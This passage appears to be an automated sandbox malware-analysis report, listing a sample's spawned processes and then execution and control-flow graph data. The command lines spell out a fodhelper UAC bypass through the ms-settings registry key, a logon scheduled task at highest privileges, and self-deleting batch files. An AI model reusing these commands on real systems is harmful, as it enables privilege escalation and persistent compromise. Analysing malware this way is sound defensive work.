                                        Has exited:false

                                        Target ID:4
                                        Start time:23:57:05
                                        Start date:31/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\$77-cmd\UACBypass1.bat" "
                                        Imagebase:0x7ff724870000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:23:57:05
                                        Start date:31/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:6
                                        Start time:23:57:05
                                        Start date:31/12/2024
                                        Path:C:\Windows\System32\reg.exe
                                        Wow64 process (32bit):false
                                        Commandline:reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /ve /d "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /f
                                        Imagebase:0x7ff721f30000
                                        File size:77'312 bytes
                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:7
                                        Start time:23:57:05
                                        Start date:31/12/2024
                                        Path:C:\Windows\System32\reg.exe
                                        Wow64 process (32bit):false
                                        Commandline:reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /v "DelegateExecute" /f
                                        Imagebase:0x7ff721f30000
                                        File size:77'312 bytes
                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:8
                                        Start time:23:57:05
                                        Start date:31/12/2024
                                        Path:C:\Windows\System32\fodhelper.exe
                                        Wow64 process (32bit):true
                                        Commandline:fodhelper.exe
                                        Imagebase:0x10000
                                        File size:49'664 bytes
                                        MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:9
                                        Start time:23:57:05
                                        Start date:31/12/2024
                                        Path:C:\Windows\System32\timeout.exe
                                        Wow64 process (32bit):false
                                        Commandline:timeout /t 2 /nobreak
                                        Imagebase:0x7ff6e36a0000
                                        File size:32'768 bytes
                                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:10
                                        Start time:23:57:05
                                        Start date:31/12/2024
                                        Path:C:\Users\user\AppData\Roaming\$77-cmd\Client.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Users\user\AppData\Roaming\$77-cmd\Client.exe"
                                        Imagebase:0xc30000
                                        File size:3'268'096 bytes
                                        MD5 hash:6D6C9C719E2F757442374AF378C343A7
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:11
                                        Start time:23:57:06
                                        Start date:31/12/2024
                                        Path:C:\Windows\System32\schtasks.exe
                                        Wow64 process (32bit):false
                                        Commandline:"schtasks" /create /tn "$77-cmd" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /rl HIGHEST /f
                                        Imagebase:0x7ff76f990000
                                        File size:235'008 bytes
                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:12
                                        Start time:23:57:06
                                        Start date:31/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:13
                                        Start time:23:57:07
                                        Start date:31/12/2024
                                        Path:C:\Windows\System32\reg.exe
                                        Wow64 process (32bit):false
                                        Commandline:reg delete "HKCU\Software\Classes\ms-settings\shell\open\command" /f
                                        Imagebase:0x7ff721f30000
                                        File size:77'312 bytes
                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:14
                                        Start time:23:57:07
                                        Start date:31/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c del "C:\Users\user\AppData\Roaming\$77-cmd\UACBypass1.bat"
                                        Imagebase:0x7ff724870000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:15
                                        Start time:23:57:07
                                        Start date:31/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\$77-cmd\UACBypass2.bat" "
                                        Imagebase:0x7ff724870000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:16
                                        Start time:23:57:07
                                        Start date:31/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:17
                                        Start time:23:57:07
                                        Start date:31/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\$77-cmd\Melt.bat" "
                                        Imagebase:0x7ff724870000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:18
                                        Start time:23:57:07
                                        Start date:31/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:19
                                        Start time:23:57:07
                                        Start date:31/12/2024
                                        Path:C:\Windows\System32\reg.exe
                                        Wow64 process (32bit):false
                                        Commandline:reg delete "HKCU\Software\Classes\ms-settings\shell\open\command" /f
                                        Imagebase:0x7ff721f30000
                                        File size:77'312 bytes
                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:20
                                        Start time:23:57:07
                                        Start date:31/12/2024
                                        Path:C:\Windows\System32\timeout.exe
                                        Wow64 process (32bit):false
                                        Commandline:timeout /t 5 /nobreak
                                        Imagebase:0x7ff6e36a0000
                                        File size:32'768 bytes
                                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:21
                                        Start time:23:57:07
                                        Start date:31/12/2024
                                        Path:C:\Windows\System32\reg.exe
                                        Wow64 process (32bit):false
                                        Commandline:reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /ve /d "C:\Users\user\AppData\Roaming\$77-cmd\Install.exe" /f
                                        Imagebase:0x7ff721f30000
                                        File size:77'312 bytes
                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:22
                                        Start time:23:57:07
                                        Start date:31/12/2024
                                        Path:C:\Windows\System32\reg.exe
                                        Wow64 process (32bit):false
                                        Commandline:reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /v "DelegateExecute" /f
                                        Imagebase:0x7ff721f30000
                                        File size:77'312 bytes
                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:23
                                        Start time:23:57:07
                                        Start date:31/12/2024
                                        Path:C:\Windows\System32\fodhelper.exe
                                        Wow64 process (32bit):false
                                        Commandline:fodhelper.exe
                                        Imagebase:0x7ff64b8c0000
                                        File size:49'664 bytes
                                        MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:24
                                        Start time:23:57:08
                                        Start date:31/12/2024
                                        Path:C:\Windows\System32\timeout.exe
                                        Wow64 process (32bit):false
                                        Commandline:timeout /t 2 /nobreak
                                        Imagebase:0x7ff6e36a0000
                                        File size:32'768 bytes
                                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:25
                                        Start time:23:57:10
                                        Start date:31/12/2024
                                        Path:C:\Windows\System32\reg.exe
                                        Wow64 process (32bit):false
                                        Commandline:reg delete "HKCU\Software\Classes\ms-settings\shell\open\command" /f
                                        Imagebase:0x7ff721f30000
                                        File size:77'312 bytes
                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:26
                                        Start time:23:57:10
                                        Start date:31/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c del "C:\Users\user\AppData\Roaming\$77-cmd\UACBypass2.bat"
                                        Imagebase:0x7ff724870000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:17.5%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:12
                                          Total number of Limit Nodes:0
                                          execution_graph 2050 7ffd9b873821 2051 7ffd9b87383f 2050->2051 2054 7ffd9b873550 2051->2054 2053 7ffd9b8738eb 2056 7ffd9b873561 DeleteFileW 2054->2056 2057 7ffd9b873626 2056->2057 2057->2053 2046 7ffd9b873579 2047 7ffd9b873581 DeleteFileW 2046->2047 2049 7ffd9b873626 2047->2049 2058 7ffd9b873535 2059 7ffd9b873541 DeleteFileW 2058->2059 2061 7ffd9b873626 2059->2061

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1742598755.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b870000_Dd5DwDCHJD.jbxd
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 552b9888f570b2bd036eeda604afafaa339560802664d396c9e047006b5f71cb
                                          • Instruction ID: b82b6991d2bb2e64d6c473b4b5068af637225db3d06a4e153934968ae308a31e
                                          • Opcode Fuzzy Hash: 552b9888f570b2bd036eeda604afafaa339560802664d396c9e047006b5f71cb
                                          • Instruction Fuzzy Hash: C141263190DB5C8FDB19DB6888596F97FF0FF5A310F0442AFD049C71A2DA24A9068791

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 13 7ffd9b873579-7ffd9b8735e8 18 7ffd9b8735f2-7ffd9b873624 DeleteFileW 13->18 19 7ffd9b8735ea-7ffd9b8735ef 13->19 20 7ffd9b87362c-7ffd9b87365a 18->20 21 7ffd9b873626 18->21 19->18 21->20
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1742598755.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b870000_Dd5DwDCHJD.jbxd
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 831efe55fc741f21da5e321836c99452b84fcd75dcb51b9ee13c235a44986634
                                          • Instruction ID: 59b2b922c39f67a05bde4e2c94567b8fd5a19941f55f02433c190de27d7aaedc
                                          • Opcode Fuzzy Hash: 831efe55fc741f21da5e321836c99452b84fcd75dcb51b9ee13c235a44986634
                                          • Instruction Fuzzy Hash: 3731C17190CB5C8FDB19DB588859AF9BBF0FF66320F04426BD049D3292DB34A9468B91

                                          Execution Graph

                                          Execution Coverage:11.5%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:8
                                          Total number of Limit Nodes:1
                                          execution_graph 12285 7ffd9bafeb09 12287 7ffd9bafeb35 12285->12287 12286 7ffd9bafebcb 12287->12286 12288 7ffd9bafecc4 SetWindowsHookExW 12287->12288 12289 7ffd9bafed06 12288->12289 12281 7ffd9b883579 12282 7ffd9b883581 DeleteFileW 12281->12282 12284 7ffd9b883626 12282->12284
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4136288347.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_7ffd9baf0000_Client.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 92388dfb210d25bc7e7c3f3f8b7b30cceb19ee30b140634a2f118a9312437640
                                          • Instruction ID: 96421de7339625223ba51a4715740bd5cd768a6cf3830b865dbb9e6119e7c488
                                          • Opcode Fuzzy Hash: 92388dfb210d25bc7e7c3f3f8b7b30cceb19ee30b140634a2f118a9312437640
                                          • Instruction Fuzzy Hash: 32F29070B19B0D8FDBA8EF58C894BA97BE1FF58300F1141A9D04ED72A6DA75E941CB40

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 637 7ffd9baf9bd1-7ffd9baf9c19 639 7ffd9baf9c1b-7ffd9baf9c29 637->639 640 7ffd9baf9c2a-7ffd9baf9c3c 637->640 642 7ffd9baf9c42-7ffd9baf9c52 640->642 643 7ffd9baf9cbf-7ffd9baf9cc3 640->643 649 7ffd9baf9f3b-7ffd9baf9f8a 642->649 650 7ffd9baf9c58-7ffd9baf9ca7 642->650 644 7ffd9baf9cdb-7ffd9baf9cdf 643->644 645 7ffd9baf9cc5-7ffd9baf9cc9 643->645 647 7ffd9baf9ce1-7ffd9baf9d08 644->647 648 7ffd9baf9d0e-7ffd9baf9d12 644->648 651 7ffd9baf9cd0-7ffd9baf9cd4 645->651 647->648 658 7ffd9baf9f91-7ffd9baf9fa9 647->658 652 7ffd9baf9f2c-7ffd9baf9f3a 648->652 653 7ffd9baf9d18-7ffd9baf9d1d 648->653 649->658 687 7ffd9baf9ca9-7ffd9baf9cb2 650->687 688 7ffd9baf9cb4-7ffd9baf9cb8 650->688 651->644 653->652 656 7ffd9baf9d23-7ffd9baf9d2d 653->656 662 7ffd9baf9d7b-7ffd9baf9d80 656->662 663 7ffd9baf9d2f-7ffd9baf9d41 656->663 673 7ffd9baf9fab-7ffd9baf9fb1 658->673 674 7ffd9baf9fb5 658->674 667 7ffd9baf9f08-7ffd9baf9f0d 662->667 668 7ffd9baf9d86-7ffd9baf9d90 662->668 663->662 675 7ffd9baf9d43-7ffd9baf9d6e 663->675 667->652 669 7ffd9baf9f0f-7ffd9baf9f24 667->669 668->667 678 7ffd9baf9d96-7ffd9baf9da8 668->678 669->652 684 7ffd9baf9f26-7ffd9baf9f29 669->684 680 7ffd9baf9fb9-7ffd9bafa018 673->680 681 7ffd9baf9fb3 673->681 674->680 682 7ffd9baf9fb7 674->682 675->662 695 7ffd9baf9d70-7ffd9baf9d74 675->695 690 7ffd9baf9e9e-7ffd9baf9ea9 678->690 691 7ffd9baf9dae-7ffd9baf9df3 678->691 701 7ffd9bafa5be-7ffd9bafa5d0 680->701 702 7ffd9bafa01e-7ffd9bafa030 680->702 681->674 682->680 684->652 687->643 688->643 697 7ffd9baf9eab-7ffd9baf9f01 690->697 698 7ffd9baf9e30-7ffd9baf9e57 690->698 691->690 715 7ffd9baf9df9-7ffd9baf9e10 691->715 695->662 697->667 698->690 710 7ffd9baf9e59-7ffd9baf9e6d 698->710 702->701 709 7ffd9bafa036-7ffd9bafa06f 702->709 709->701 721 7ffd9bafa075-7ffd9bafa0b6 709->721 725 7ffd9bafa0bc-7ffd9bafa0d4 721->725 726 7ffd9bafa168-7ffd9bafa17b 721->726 729 7ffd9bafa15c-7ffd9bafa162 725->729 730 7ffd9bafa0da-7ffd9bafa0fa 725->730 731 7ffd9bafa1d0 726->731 732 7ffd9bafa17d-7ffd9bafa19e 726->732 729->725 729->726 730->729 743 7ffd9bafa0fc-7ffd9bafa10e 730->743 733 7ffd9bafa1d2-7ffd9bafa1d7 731->733 738 7ffd9bafa1c9-7ffd9bafa1ce 732->738 739 7ffd9bafa1a0-7ffd9bafa1c7 732->739 734 7ffd9bafa1d9-7ffd9bafa1e0 733->734 735 7ffd9bafa21e-7ffd9bafa241 733->735 740 7ffd9bafa1e7-7ffd9bafa201 734->740 744 7ffd9bafa337-7ffd9bafa343 735->744 745 7ffd9bafa247-7ffd9bafa26f 735->745 738->733 739->733 740->735 749 7ffd9bafa203-7ffd9bafa21c 740->749 743->729 752 7ffd9bafa110-7ffd9bafa114 743->752 744->701 748 7ffd9bafa349-7ffd9bafa35e 744->748 757 7ffd9bafa32b-7ffd9bafa331 745->757 758 7ffd9bafa275-7ffd9bafa290 745->758 748->701 749->735 754 7ffd9bafa11a-7ffd9bafa12f 752->754 755 7ffd9bafa5d1-7ffd9bafa673 752->755 763 7ffd9bafa136-7ffd9bafa138 754->763 764 7ffd9bafa679-7ffd9bafa67b 755->764 765 7ffd9bafa785-7ffd9bafa791 755->765 757->744 757->745 758->757 770 7ffd9bafa296-7ffd9bafa2a8 758->770 763->729 767 7ffd9bafa13a-7ffd9bafa158 call 7ffd9baf53c0 763->767 768 7ffd9bafa695-7ffd9bafa6a3 764->768 769 7ffd9bafa67d-7ffd9bafa68f 764->769 776 7ffd9bafa7ba 765->776 777 7ffd9bafa793-7ffd9bafa7b8 765->777 767->729 774 7ffd9bafa6a9-7ffd9bafa6c0 768->774 775 7ffd9bafa7f8-7ffd9bafa82b 768->775 769->768 784 7ffd9bafa7bf-7ffd9bafa7f1 769->784 770->757 785 7ffd9bafa2ae-7ffd9bafa2b2 770->785 794 7ffd9bafa6da-7ffd9bafa6dd 774->794 795 7ffd9bafa6c2-7ffd9bafa6d4 774->795 799 7ffd9bafa832-7ffd9bafa83e 775->799 776->784 777->776 784->775 785->755 787 7ffd9bafa2b8-7ffd9bafa2fb 785->787 787->757 817 7ffd9bafa2fd-7ffd9bafa328 call 7ffd9baf53c0 787->817 796 7ffd9bafa706-7ffd9bafa722 call 7ffd9baf7a50 794->796 797 7ffd9bafa6df-7ffd9bafa6f6 794->797 795->794 795->799 821 7ffd9bafa724-7ffd9bafa752 796->821 822 7ffd9bafa753-7ffd9bafa757 796->822 797->796 820 7ffd9bafa6f8-7ffd9bafa6fc 797->820 805 7ffd9bafa867 799->805 806 7ffd9bafa840-7ffd9bafa864 799->806 808 7ffd9bafa87b 805->808 809 7ffd9bafa869-7ffd9bafa871 805->809 806->805 814 7ffd9bafa87d 808->814 813 7ffd9bafa873-7ffd9bafa879 809->813 809->814 813->808 818 7ffd9bafa881-7ffd9bafa8bc 813->818 814->818 819 7ffd9bafa87f 814->819 817->757 824 7ffd9bafa8ff-7ffd9bafa932 818->824 825 7ffd9bafa8be-7ffd9bafa8e5 818->825 819->818 829 7ffd9bafa703-7ffd9bafa704 820->829 826 7ffd9bafa75e-7ffd9bafa784 822->826 839 7ffd9bafa939-7ffd9bafa981 824->839 825->839 842 7ffd9bafa8e7-7ffd9bafa8fe 825->842 829->796 848 7ffd9bafa985-7ffd9bafa9a7 839->848 849 7ffd9bafa983 839->849 852 7ffd9bafaa8a-7ffd9bafaa96 848->852 853 7ffd9bafa9ad-7ffd9bafa9bf 848->853 849->848 850 7ffd9bafa9c5-7ffd9bafa9ca 849->850 856 7ffd9bafaa98-7ffd9bafaabd 852->856 857 7ffd9bafaabf-7ffd9bafaad3 852->857 858 7ffd9bafa9cb-7ffd9bafa9e3 call 7ffd9baf40b0 853->858 859 7ffd9bafa9c1-7ffd9bafa9c4 853->859 856->857 863 7ffd9bafab15-7ffd9bafab17 857->863 864 7ffd9bafaad5-7ffd9bafaaf2 857->864 869 7ffd9bafaa47-7ffd9bafaa50 858->869 870 7ffd9bafa9e5-7ffd9bafaa16 858->870 859->850 867 7ffd9bafab19-7ffd9bafab1b 863->867 864->867 868 7ffd9bafaaf4-7ffd9bafab0f 864->868 872 7ffd9bafab2c-7ffd9bafab3c 867->872 873 7ffd9bafab1d-7ffd9bafab2b 867->873 868->867 871 7ffd9bafab11-7ffd9bafab12 868->871 877 7ffd9bafaa18-7ffd9bafaa3f 870->877 878 7ffd9bafaa41-7ffd9bafaa45 870->878 871->863 877->878 880 7ffd9bafaa51-7ffd9bafaa89 877->880 878->869 878->870
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4136288347.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_7ffd9baf0000_Client.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ad215a23ed05e685791d4467d276e878df2ac0fde13c0bfc32dfe16301bcee27
                                          • Instruction ID: cc30408de48f088fc560fd93795706c929fc24beaf7a0488ef64839293a99e41
                                          • Opcode Fuzzy Hash: ad215a23ed05e685791d4467d276e878df2ac0fde13c0bfc32dfe16301bcee27
                                          • Instruction Fuzzy Hash: 1692083171DA0D4FEBA8EB6CD465AB537E1EF98310F0501BAE44EC32A6DE64EC428741

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 897 7ffd9bafafdd-7ffd9bafb079 899 7ffd9bafb6f1-7ffd9bafb706 897->899 900 7ffd9bafb07f-7ffd9bafb082 897->900 900->899 901 7ffd9bafb088-7ffd9bafb0a5 900->901 901->899 903 7ffd9bafb0ab-7ffd9bafb0ca 901->903 905 7ffd9bafb0cc-7ffd9bafb0cf 903->905 906 7ffd9bafb0d6-7ffd9bafb0e9 903->906 907 7ffd9bafb0d1 905->907 908 7ffd9bafb0ee-7ffd9bafb11e 905->908 909 7ffd9bafb179-7ffd9bafb18b 906->909 907->899 908->899 914 7ffd9bafb124-7ffd9bafb172 908->914 909->899 912 7ffd9bafb191-7ffd9bafb1d0 909->912 912->899 919 7ffd9bafb1d6-7ffd9bafb1e0 912->919 914->909 922 7ffd9bafb1f8-7ffd9bafb208 919->922 923 7ffd9bafb1e2-7ffd9bafb1f6 919->923 926 7ffd9bafb212-7ffd9bafb267 922->926 923->926 930 7ffd9bafb26d-7ffd9bafb275 926->930 931 7ffd9bafb2db-7ffd9bafb2e3 930->931 932 7ffd9bafb277-7ffd9bafb28b 930->932 931->899 933 7ffd9bafb2e9-7ffd9bafb30b 931->933 932->931 935 7ffd9bafb28d-7ffd9bafb2d7 932->935 937 7ffd9bafb311-7ffd9bafb33a 933->937 938 7ffd9bafb40f-7ffd9bafb41a 933->938 935->931 944 7ffd9bafb3c1-7ffd9bafb3e2 937->944 945 7ffd9bafb340-7ffd9bafb366 937->945 942 7ffd9bafb48c-7ffd9bafb4b5 938->942 943 7ffd9bafb41c-7ffd9bafb445 938->943 960 7ffd9bafb4d8-7ffd9bafb4e5 942->960 961 7ffd9bafb4b7-7ffd9bafb4d1 942->961 943->899 956 7ffd9bafb44b-7ffd9bafb45d 943->956 944->937 947 7ffd9bafb3e8 944->947 945->944 957 7ffd9bafb368-7ffd9bafb37e 945->957 947->938 956->899 962 7ffd9bafb463-7ffd9bafb481 956->962 957->944 966 7ffd9bafb380-7ffd9bafb398 957->966 968 7ffd9bafb4eb-7ffd9bafb518 960->968 969 7ffd9bafb5aa-7ffd9bafb5ca 960->969 961->960 962->899 977 7ffd9bafb487-7ffd9bafb488 962->977 966->944 974 7ffd9bafb39a-7ffd9bafb3bf 966->974 985 7ffd9bafb53b-7ffd9bafb547 968->985 986 7ffd9bafb51a-7ffd9bafb534 968->986 975 7ffd9bafb5cc-7ffd9bafb5cd 969->975 976 7ffd9bafb5d4-7ffd9bafb610 969->976 974->944 980 7ffd9bafb3ea-7ffd9bafb408 974->980 975->976 976->899 992 7ffd9bafb616-7ffd9bafb633 976->992 977->942 980->938 990 7ffd9bafb549-7ffd9bafb555 985->990 991 7ffd9bafb598-7ffd9bafb5a4 985->991 986->985 993 7ffd9bafb55b-7ffd9bafb591 990->993 994 7ffd9bafb840-7ffd9bafb857 990->994 991->899 991->969 999 7ffd9bafb635-7ffd9bafb636 992->999 1000 7ffd9bafb63d-7ffd9bafb678 992->1000 993->991 1001 7ffd9bafb859-7ffd9bafb860 994->1001 1002 7ffd9bafb861-7ffd9bafb8cf call 7ffd9baf5070 call 7ffd9baf7d70 call 7ffd9baf5370 call 7ffd9bafb8d0 994->1002 999->1000 1000->899 1014 7ffd9bafb67a-7ffd9bafb68c 1000->1014 1001->1002 1014->899 1018 7ffd9bafb68e-7ffd9bafb6ac 1014->1018 1018->899 1021 7ffd9bafb6ae-7ffd9bafb6ca 1018->1021 1024 7ffd9bafb6cc-7ffd9bafb6ef 1021->1024 1025 7ffd9bafb707-7ffd9bafb77c 1021->1025 1024->899 1024->1025 1035 7ffd9bafb827-7ffd9bafb83f 1025->1035 1036 7ffd9bafb782-7ffd9bafb78b 1025->1036 1036->1035
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4136288347.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_7ffd9baf0000_Client.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3b97cc8404c5e456dcde2a08a18fbc8acd210c74376fbb089ccc1fd4bb929403
                                          • Instruction ID: 561ae21b5997119c5c23f0ece58c263589e22bf1a26f1045cd1d485742f6839b
                                          • Opcode Fuzzy Hash: 3b97cc8404c5e456dcde2a08a18fbc8acd210c74376fbb089ccc1fd4bb929403
                                          • Instruction Fuzzy Hash: 47526330B08A498FDBA8EB2CC464BA57BE1FF99304F5545B9E04DC72A6DE74E841CB41

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
